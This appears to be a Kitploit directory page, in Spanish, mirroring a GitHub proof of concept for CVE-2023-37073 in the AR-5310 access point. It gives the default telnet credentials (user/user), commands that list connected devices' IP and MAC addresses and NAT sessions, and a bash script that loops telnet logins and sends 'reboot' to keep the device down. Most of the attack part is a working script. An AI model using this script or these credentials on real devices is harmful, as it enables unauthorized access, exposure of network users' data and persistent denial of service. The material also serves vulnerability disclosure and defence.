Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-37073 — Las credenciales predeterminadas de Telnet pueden provocar la divulgación de información y ataques de denegación de servicio (DoS). | Kitploit
Herramientas/GitHubGitHub/hamza0x/cve-2023-37073
Seguridad IoTAtaques de ContraseñasExplotaciónRecopilación de InformaciónSeguridad de Hardware e IoT
GitHubhamza0x/cve-2023-37073

CVE-2023-37073

Las credenciales predeterminadas de Telnet pueden provocar la divulgación de información y ataques de denegación de servicio (DoS).

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-37073

Las credenciales predeterminadas de Telnet pueden provocar divulgación de información y ataques de denegación de servicio (DoS).

Pasos para reproducir

Esto afecta al AP AR-5310

root@kitploit:~
  Telnet 192.168.1.1
  username:user
  password:user
  Then Boom ... You logged in 

Divulgación de información a través de credenciales predeterminadas de Telnet

root@kitploit:~
    When you log in using Telnet service, 
    type the command 'help' or '?' to view    
    available options:
    
    > reboot, ping, lanhosts, passwd
  
    > restoredefault, nslookup, traceroute
  
    > save, uptime, exitOnIdle, wan, version,
  
    > serialnumber, modelname, tr69cfg, nat

root@kitploit:~
  To obtain the IP and MAC address of each device 
  connected to the network, run the command  
  'lanhosts'.
  To display all NAT sessions through the Access  
  Point (AP), 
  use the command 'nat show session'

Ataque DoS

root@kitploit:~
  To execute a Denial of Service (DoS) attack, 
  run the command 'reboot' to restart the AP. 
  I want to automate a script that will 
  consistently restart the AP.

Automatizar el ataque DoS mediante script de shell

root@kitploit:~
#!/bin/bash

# Telnet credentials
USER="user"
PASSWORD="user"
HOST="192.168.1.1"

# Function to check host availability
check_host_availability() {
    ping -c 1 -W 1 "$HOST" > /dev/null 2>&1
    return $?
}

# Loop to check host availability and execute Telnet command when available
while true; do
    if check_host_availability; then
        echo "Host $HOST is reachable. Initiating Telnet connection and reboot..."
        { sleep 1; echo "$USER"; sleep 1; echo "$PASSWORD"; sleep 1; echo "reboot"; sleep 1; } | telnet "$HOST"
    else
        echo "Host $HOST is not reachable. Retrying in 10 seconds..."
        sleep 10
    fi
done
Descargar herramienta